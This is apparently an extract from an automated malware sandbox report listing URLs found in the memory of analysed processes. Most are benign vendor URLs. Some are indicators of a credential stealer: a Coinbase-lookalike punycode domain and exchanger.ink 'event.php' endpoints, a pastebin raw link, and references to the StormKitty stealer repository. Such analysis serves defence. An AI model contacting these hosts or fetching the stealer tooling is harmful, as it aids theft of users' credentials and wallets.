Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.dr	String found in binary or memory: https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/
Source: explorer.exe, 00000002.00000002.3162050946.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg
Source: explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233130000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://auth.co1
Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233130000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://auth.xn--conbase-sfb.xyz/
Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://auth.xn--conbase-sfb.xyz/c
Source: relog.exe	String found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.php
Source: xj40xovMsm.exe, 00000019.00000002.2618262946.00000229BA940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.phphttps://exchanger.ink/event.
Source: xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.dr	String found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.phphttps://exchanger.ink/event.phpSystemUpdate.exeTaskmgr.exe
Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.phpx
Source: prefs.js.1.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: prefs.js.1.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: xj40xovMsm.exe	String found in binary or memory: https://cex.io/widget/light/100/btc-usd
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xj40xovMsm.exe	String found in binary or memory: https://coinkeep.info/d3n13d/formpage.html
Source: prefs.js.1.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: prefs.js.1.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: relog.exe	String found in binary or memory: https://exchanger.ink/event.php
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://forums.dropbox.com
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: 4BC4.tmp.Client.exe.2.dr, 4336.tmp.Server.exe.2.dr	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024C6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&fq
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: prefs.js.1.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.000000000258F000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.dr	String found in binary or memory: https://pastebin.com/raw/7B75u64B
Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B7P&Z
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B7P:
Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.dr	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
Source: tmp853A.tmp.dat.9.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp853A.tmp.dat.9.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp853A.tmp.dat.9.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: tmp5A30.tmp.dat.39.dr, History.txt.6.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, History.txt.9.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, History.txt0.10.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.dr, History.txt0.39.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: tmp5A30.tmp.dat.39.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: tmp5A30.tmp.dat.39.dr, History.txt.6.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, History.txt.9.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, History.txt0.10.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.dr, History.txt0.39.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: tmp5A30.tmp.dat.39.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000002.3176869488.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: prefs.js.1.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/help
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/home
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/login
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: prefs.js.1.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.igenius.org/Server.exe
Source: tmp853A.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp853A.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: tmp853A.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024C6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, History.txt.10.dr, History.txt0.6.dr, History.txt.39.dr, History.txt0.9.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: tmp7C70.tmp.dat.6.dr, tmp1732.tmp.dat.39.dr, tmp5850.tmp.dat.10.dr, places.raw.10.dr, tmp853A.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp853A.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmp7C70.tmp.dat.6.dr, tmp1732.tmp.dat.39.dr, tmp5850.tmp.dat.10.dr, places.raw.10.dr, tmp853A.tmp.dat.9.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
